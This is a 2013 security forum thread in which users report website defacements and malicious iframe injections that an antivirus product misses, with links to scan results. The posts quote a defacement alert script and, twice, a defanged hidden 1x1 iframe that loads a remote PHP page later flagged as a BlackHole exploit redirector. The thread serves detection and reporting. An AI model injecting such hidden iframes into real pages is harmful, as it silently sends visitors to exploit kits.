Avast does not detect LONG OVERDUE HTML_BACHACK.A site defacement

polonus · February 24, 2013, 3:45pm

See: https://www.virustotal.com/en/url/599cf281a4816ffd34ab1f23bb4b75cb9e97417d48d7f2233a9a099c407aa262/analysis/1361719588/
and
https://www.virustotal.com/en/file/189f1de67a461769aa52ae30834adb93882393ee15952c5f50b32f80ee1831cf/analysis/
URL Type Risk
htxp://www.edepot.com/graphics/flags/bangladesh.gif external element benign → link rel=“SHORTCUT ICON” href=" on line 174
Line 3 in code:

 3: <  script > alert("Hacked By D€str0y€r s@m - BCA Hackers")< / script >

Hacked and defaced syte - malcreators/defacers = Bangladesh Cyber Army → http://pastebin.com/4DP0GxbY
Proof: http://www.zone-h.org/archive/notifier=bangladesh%20cyber%20army/page=37
Still active OVERDUE since 2012-11-26 15:48:03

polonus

polonus · February 24, 2013, 4:15pm

Another one: https://www.virustotal.com/en/url/9e7055167702ae427676e9c1dfddc7e1f757833e0a256173e54d1b007f4f84ef/analysis/
Detected: http://www.urlvoid.com/scan/tarsudi.com/ Exploit.HTML.IFrame-6
Content after the < /html> tag should be considered suspicious.
< br />
53: < b> Fatal error< /b> : Call to undefined function wp() in < b> /home/refocatc/public_html/tarsudi dot com/wp-blog-header.php< /b> on line < b> 14< /b> < br />
54: < !–(62bf5e88d5)–> < iframe src=“htxp://onemillionathome.com/salmon.php” width=1 height=1 style=“visibility: hidden”> < / iframe > < !–(/62bf5e88d5)–>
Abuse Some PHP classes for dealing with Salmon (WP-plug-in), both original code and modified forks of stuff which is elsewhere. Packaged up as a Composer package, all PSR-0 compliant for awesome autoloading “and defacement abuse”. Nat Sakimura on indieweb " " added by me polonus…
and another similar defacement, see “through the eyes” of a file viewer: http://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fkampungkali.com%2F&ref_sel=Google&ua_sel=ff

polonus

Pondus · February 24, 2013, 10:35pm

polonus post:2:

Another one: https://www.virustotal.com/en/url/9e7055167702ae427676e9c1dfddc7e1f757833e0a256173e54d1b007f4f84ef/analysis/
Detected: http://www.urlvoid.com/scan/tarsudi.com/ Exploit.HTML.IFrame-6
Content after the < /html> tag should be considered suspicious.
< br />
53: < b> Fatal error< /b> : Call to undefined function wp() in < b> /home/refocatc/public_html/tarsudi dot com/wp-blog-header.php< /b> on line < b> 14< /b> < br />
54: < !–(62bf5e88d5)–> < iframe src=“htxp://onemillionathome.com/salmon.php” width=1 height=1 style=“visibility: hidden”> < / iframe > < !–(/62bf5e88d5)–>
Abuse Some PHP classes for dealing with Salmon (WP-plug-in), both original code and modified forks of stuff which is elsewhere. Packaged up as a Composer package, all PSR-0 compliant for awesome autoloading “and defacement abuse”. Nat Sakimura on indieweb " " added by me polonus…
and another similar defacement, see “through the eyes” of a file viewer: http://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fkampungkali.com%2F&ref_sel=Google&ua_sel=ff

polonus

VirusTotal
https://www.virustotal.com/en/file/52fcfc51c60af395cc4cf72b6a1cf2f77512f673a0e7312b81617e1275d21d0c/analysis/1361745269/

sucuri http://sitecheck.sucuri.net/results/tarsudi.com/

urlquery - Detected malicious iframe injection
http://urlquery.net/report.php?id=1106236

polonus · February 24, 2013, 11:15pm

Hi Pondus,

Something weird on the Sucuri results: http://sitecheck.sucuri.net/results/tarsudi.com
PHP error: Fatal error: Call to undefined function wp() in /home/refo
List of iframes included → htxp://onemillionathome.com/salmon.php
scam site?: htxp://onemillionathome.com/images/
This web beacon found on there: hxtp://www.onemillionathome.com/images/spacer00.gif

polonus

system · February 25, 2013, 3:23am

Hi Polonus,

https://www.virustotal.com/ru/file/ea72b4b80602ae7f4718ca8b7691c8dc69a2d069e501ed86e28a384ef5b5b271/analysis/1361762283/

Sent DrWeb and Avast.

Exploit.BlackHole.12 - DrWeb
JS:Redirector-AGQ - Avast

Avast does not detect LONG OVERDUE HTML_BACHACK.A site defacement

Announcements